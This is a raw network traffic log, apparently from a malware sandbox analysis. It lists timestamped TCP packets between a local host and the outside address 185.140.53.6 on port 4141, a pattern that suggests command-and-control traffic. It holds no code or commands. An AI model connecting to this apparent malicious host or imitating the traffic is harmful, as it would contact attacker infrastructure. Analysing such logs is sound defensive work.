Jan 24, 2022 02:25:10.942286015 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.942337990 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.942440987 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.942495108 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.942563057 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.942609072 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:14.872493029 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:14.965198994 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:14.965322018 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:14.965822935 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:15.214595079 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:15.214689016 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:15.514138937 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:15.514251947 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:15.642194033 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:15.642328024 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:15.948287964 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:15.948384047 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.139717102 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.139753103 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.139976025 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.140007973 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.225701094 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.225867033 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.240303993 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.240360022 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.240400076 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.240468025 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.240536928 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.328032017 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.328150988 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.353262901 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.353316069 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.353358030 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.353468895 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.387641907 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.387805939 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.389153004 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.389210939 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.389297962 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.389353037 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.389367104 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.389411926 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.422200918 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.422303915 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.443613052 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.443752050 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.443794966 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.443830967 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.443897963 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.443979979 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.447313070 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.447355032 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.447431087 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.447489977 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.469228983 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.499596119 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.499831915 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.500128031 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.500320911 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.500327110 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.500405073 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.500695944 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.500741959 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.500775099 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.500813961 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.500817060 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.500881910 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.501390934 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.501467943 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.504134893 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.504216909 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.505913019 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.506016016 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.586946011 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.586985111 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.587011099 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.587038040 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.587218046 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.587302923 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.587382078 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.587529898 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.587541103 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.587696075 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.593528986 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.593578100 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.593715906 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.593759060 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.593792915 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.593842030 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.593863010 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.593914986 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.593961000 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.594002008 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.594316006 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.594377995 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.594458103 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.594532013 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.594707012 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.594784975 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.594785929 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.594857931 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.594858885 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.594949961 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.594989061 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.595057964 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.603975058 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.604006052 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.604110003 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.604209900 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.604271889 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.604393005 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.608417034 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.608490944 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.608521938 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.608588934 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.610074043 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.610146046 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.610165119 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.610238075 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.610271931 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.610348940 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.610368013 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.610451937 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.610510111 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.610577106 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.610614061 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.610688925 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.610728025 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.610794067 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.610862017 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.610929012 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.610932112 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.611001968 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.611058950 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.611124039 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.611259937 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.611325979 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.706837893 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.706897974 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.706935883 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.706974030 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.707012892 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.707098007 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.707166910 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.707199097 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.707251072 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.707293034 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.707334042 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.707376003 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.707423925 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.707539082 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.707576990 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.707617044 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.707694054 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.707803011 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.707897902 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.710249901 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.710350990 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.735421896 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.735450983 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.735471010 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.735589027 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.735596895 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.735702991 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.735815048 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.735836029 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.735893011 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.736056089 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.736131907 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.736159086 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.736294031 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.736314058 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.736368895 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.736371040 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.736447096 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.736499071 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.736569881 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.736634970 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.736705065 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.736771107 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.736857891 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.736926079 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.736991882 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.737000942 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.737063885 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.737118006 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.737184048 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.737250090 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.737315893 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.737349033 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.737421036 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.737487078 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.737556934 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.737611055 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.737682104 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.737683058 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.737757921 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.737874985 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.737896919 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.737948895 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.737970114 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.738044024 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.738054037 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.738130093 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.738332987 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.738665104 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.751033068 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.852727890 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.852777004 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.852811098 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.852842093 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.852859020 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.852893114 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.852902889 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.852938890 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.852960110 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.853035927 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.853099108 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.853231907 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.853291988 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.853378057 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.853410959 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.853439093 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.853462934 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.853585005 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.853646040 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.853661060 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.853718042 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.853758097 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.853813887 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.853914976 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.854006052 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.854202032 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.854262114 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.854262114 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.854321003 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.854382992 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.854440928 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.854465961 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.854521036 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.854547024 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.854604006 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.854665041 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.854723930 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.854783058 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.854846001 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.854909897 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.854967117 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.855133057 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.855194092 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.855253935 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.855310917 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.855839014 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.855926991 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.856232882 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.856292963 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.856515884 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.856576920 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.856607914 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.856647015 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.856662035 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.856709003 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.856806040 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.856897116 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.856952906 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.857055902 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.857112885 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.857173920 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.857229948 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.857290983 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.857346058 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.857407093 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.857460976 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.857625961 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.857683897 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.857736111 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.857791901 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.857831001 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.857920885 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.860486031 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.860851049 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.871479034 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.871520996 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.871540070 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.871587992 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.871612072 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.871669054 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.871725082 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.871907949 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.871968031 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.893668890 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.893739939 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.893824100 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.893898010 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.893938065 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.893954039 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.893979073 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:16.893994093 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:16.894037962 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:17.051717043 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:17.051750898 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:17.051773071 CET	4141	49778	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:17.051913023 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:17.051975012 CET	49778	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:20.956939936 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:21.070646048 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:21.070823908 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:21.071315050 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:21.324995995 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:21.325154066 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:21.649843931 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:21.650026083 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:21.772528887 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:21.772641897 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.092318058 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.092400074 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.302000999 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.302045107 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.302114964 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.302165031 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.514771938 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.514833927 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.514869928 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.514909029 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.514909983 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.514950037 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.514974117 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.684231043 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.684314966 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.684346914 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.684514046 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.684535027 CET	4141	49779	185.140.53.6	192.168.2.4
